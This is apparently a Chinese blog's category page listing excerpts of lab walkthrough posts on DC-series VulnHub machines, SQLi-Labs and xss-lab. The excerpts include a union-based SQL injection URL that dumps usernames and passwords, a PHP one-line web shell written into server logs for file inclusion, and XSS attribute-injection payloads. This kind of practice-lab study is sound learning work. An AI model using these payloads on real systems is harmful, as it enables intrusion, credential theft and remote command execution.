![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
靶场
文章平均质量分 91
靶场
浔阳江头夜送客丶
这个作者很懒,什么都没留下…
展开
-
DC-3靶机笔记
DC-3DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.As with the previous DC releases, this one is designed with beginners in m...原创 2021-08-16 00:16:35 · 471 阅读 · 0 评论 -
DC-7靶机笔记
DC-7DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.While this isn’t an overly technical challenge, it isn’t exactly easy.Whi...原创 2021-08-22 20:39:19 · 124 阅读 · 0 评论 -
DC-8靶机笔记
DC-8DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.This challenge is a bit of a hybrid between being an actual challenge, and...原创 2021-08-22 11:10:25 · 167 阅读 · 0 评论 -
SQLi-Labs靶场总结
SQLi-Labs靶场总结普通注入1http://127.0.0.1/sqli-labs/Less-1/?id=1’ union select 1,2,group_concat(username,0x3a,password) from security.users limit 1,1–+2http://localhost/sqli/Less-2/?id=-1 union select 1,@@...原创 2021-07-30 18:13:42 · 333 阅读 · 0 评论 -
DC-5日志写马
先尝试远程文件包含发现开启了url_include所以不行那php://input也不行那就尝试往日志里面写,然后包含日志文件往日志中写个一句话木马<?php @system($_GET['rerce']); ?>http://192.168.253.134/thankyou.php?file=``在进行文件包含时,发现不是路径就会将其写入到error日志里面去查看err...原创 2021-08-18 20:22:14 · 129 阅读 · 0 评论 -
DC-6靶机笔记
DC-6DESCRIPTIONDC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.This isn’t an overly difficult challenge so should be great for...原创 2021-08-19 04:06:39 · 124 阅读 · 0 评论 -
DC-2靶机笔记
DC-2DESCRIPTIONMuch like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.As with the original DC-1, it’s designed with b...原创 2021-08-14 22:34:35 · 189 阅读 · 0 评论 -
DC-9靶机笔记
DC-9DESCRIPTIONDC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.The ultimate goal of this challenge is to get root and to read ...原创 2021-08-24 11:26:20 · 218 阅读 · 0 评论 -
xss-lab通关笔记
xss-lab测试payload:<script “ ‘ OOnn/>第一关发现参数name的值被回显到了屏幕上,尝试是否name处存在xss 成功第二关当我们输入test后,返回的网页源码看到后端将test赋给了input的属性构造payload闭合input标签" onfocus=alert('xss') autofocus //成功弹窗第三关输入test并...原创 2021-08-03 15:23:37 · 257 阅读 · 0 评论